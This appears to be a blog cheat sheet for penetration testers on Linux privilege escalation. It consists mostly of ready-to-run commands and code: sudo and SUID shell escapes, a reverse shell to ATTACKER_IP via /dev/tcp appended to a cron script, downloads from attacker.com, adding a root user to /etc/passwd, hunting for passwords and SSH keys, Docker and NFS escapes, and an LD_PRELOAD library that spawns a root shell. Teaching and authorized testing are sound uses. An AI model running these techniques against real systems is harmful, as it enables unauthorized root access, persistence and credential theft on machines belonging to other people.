Penetration Testing 25 November 2025 6 min read

Linux Privilege Escalation: Complete Guide for Pentesters

Privilege escalation is a critical phase in penetration testing where you elevate your access from a low-privileged user to root. This guide covers the most common Linux privilege escalation techniques, enumeration methods, and tools.

Initial Enumeration

Before attempting privilege escalation, gather information about the system.

System Information

# OS and kernel version
uname -a
cat /etc/os-release
cat /etc/issue
lsb_release -a

# Kernel version (important for kernel exploits)
uname -r

# Architecture
uname -m
arch

# Hostname
hostname

User Information

# Current user
whoami
id

# All users
cat /etc/passwd
cat /etc/passwd | grep -v nologin | grep -v false

# User groups
groups
cat /etc/group

# Logged in users
w
who
last

# Sudo privileges
sudo -l

Network Information

# Network interfaces
ip a
ifconfig

# Routing table
ip route
route -n

# Open ports
ss -tulpn
netstat -tulpn

# Established connections
ss -tp
netstat -tp

# ARP table
arp -a
ip neigh

Automated Enumeration Tools

LinPEAS

# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or transfer and run
wget http://attacker.com/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum

wget http://attacker.com/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -t

Linux Smart Enumeration (LSE)

curl -L https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh | bash

Sudo Exploitation

Check Sudo Permissions

sudo -l

Common Sudo Exploits

If you can run specific commands as root, check GTFOBins for exploitation methods:

# vim
sudo vim -c ':!/bin/bash'

# less
sudo less /etc/passwd
!/bin/bash

# find
sudo find /tmp -exec /bin/bash \;

# awk
sudo awk 'BEGIN {system("/bin/bash")}'

# python
sudo python -c 'import os; os.system("/bin/bash")'

# perl
sudo perl -e 'exec "/bin/bash";'

# ruby
sudo ruby -e 'exec "/bin/bash"'

# nmap (old versions)
sudo nmap --interactive
!sh

# tar
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

# zip
sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

# env
sudo env /bin/bash

Sudo Version Exploits

# Check sudo version
sudo --version

# CVE-2021-3156 (Baron Samedit) - Sudo 1.8.2 to 1.8.31p2, 1.9.0 to 1.9.5p1
# CVE-2019-14287 - Sudo < 1.8.28 (run as user ID -1)

SUID/SGID Binaries

Finding SUID/SGID Files

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null

# Find both
find / -perm /6000 -type f 2>/dev/null

Exploiting SUID Binaries

Check GTFOBins for SUID exploitation. Common examples:

# bash SUID
/bin/bash -p

# find SUID
find . -exec /bin/sh -p \; -quit

# vim SUID
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

# python SUID
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# cp SUID (copy /etc/passwd, modify, copy back)
# nmap SUID (older versions with --interactive)

Cron Jobs

Finding Cron Jobs

# System cron
cat /etc/crontab
ls -la /etc/cron.*

# User cron
crontab -l
ls -la /var/spool/cron/crontabs/

# Check for running cron processes
ps aux | grep cron

# Monitor for cron execution
# Use pspy to monitor processes without root

Exploiting Cron Jobs

# If a cron job runs a writable script
echo '/bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /path/to/script.sh

# If cron uses wildcard with tar
# Create malicious files in the directory
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"

# If cron runs a script that sources a writable file
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /writable/file

Writable Files and Directories

Finding Writable Locations

# World-writable files
find / -writable -type f 2>/dev/null

# World-writable directories
find / -writable -type d 2>/dev/null

# Files owned by current user
find / -user $(whoami) -type f 2>/dev/null

# Writable /etc/passwd
ls -la /etc/passwd

Exploiting Writable /etc/passwd

# Generate password hash
openssl passwd -1 -salt xyz password123

# Add new root user
echo 'newroot:$1$xyz$Abc123...:0:0:root:/root:/bin/bash' >> /etc/passwd

# Or replace root password hash
# Copy /etc/passwd, modify, replace

Capabilities

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Common exploitable capabilities
# cap_setuid - allows changing UID
# Example with python
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# cap_net_raw - allows raw sockets
# cap_dac_override - bypass file read/write permissions

Kernel Exploits

Finding Kernel Version

uname -r
cat /proc/version

Common Kernel Exploits

# Dirty COW (CVE-2016-5195) - Linux kernel < 4.8.3
# Dirty Pipe (CVE-2022-0847) - Linux kernel 5.8+

# Use searchsploit to find exploits
searchsploit linux kernel 4.4 privilege escalation

# Linux Exploit Suggester
./linux-exploit-suggester.sh

Password Hunting

# Search for passwords in files
grep -r "password" /home 2>/dev/null
grep -r "passwd" /home 2>/dev/null
grep -ri "pass" /etc 2>/dev/null

# History files
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history

# Config files
find / -name "*.conf" -type f 2>/dev/null | xargs grep -l "password" 2>/dev/null
find / -name "*.config" -type f 2>/dev/null
find / -name "*.ini" -type f 2>/dev/null

# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
cat ~/.ssh/id_rsa

# Web config files
cat /var/www/html/wp-config.php
cat /var/www/html/config.php

NFS Exploitation

# Check for NFS shares
cat /etc/exports
showmount -e target_ip

# If no_root_squash is set, mount and create SUID binary
# On attacker machine:
mkdir /tmp/nfs
mount -t nfs target_ip:/share /tmp/nfs
cp /bin/bash /tmp/nfs/
chmod +s /tmp/nfs/bash

# On target:
/share/bash -p

Docker Escape

# Check if in Docker
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv

# If user is in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Docker socket exposed
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh

PATH Hijacking

# If a SUID binary calls another binary without full path
# Check with strings
strings /usr/local/bin/suid-binary | grep -i "system\|exec\|popen"

# Create malicious binary in writable PATH location
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suid-binary

LD_PRELOAD Exploitation

# If sudo -l shows env_keep+=LD_PRELOAD
# Create malicious shared library

# shell.c
#include 
#include 
#include 

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}

# Compile
gcc -fPIC -shared -nostartfiles -o /tmp/shell.so shell.c

# Execute
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/allowed_binary

Summary

Linux privilege escalation requires systematic enumeration and understanding of common misconfigurations. Always run automated tools like LinPEAS, but also perform manual checks. Document your findings and chain multiple weaknesses when single vulnerabilities are not directly exploitable.

Written by

Window Events

Leave a Reply

Your email address will not be published. Required fields are marked *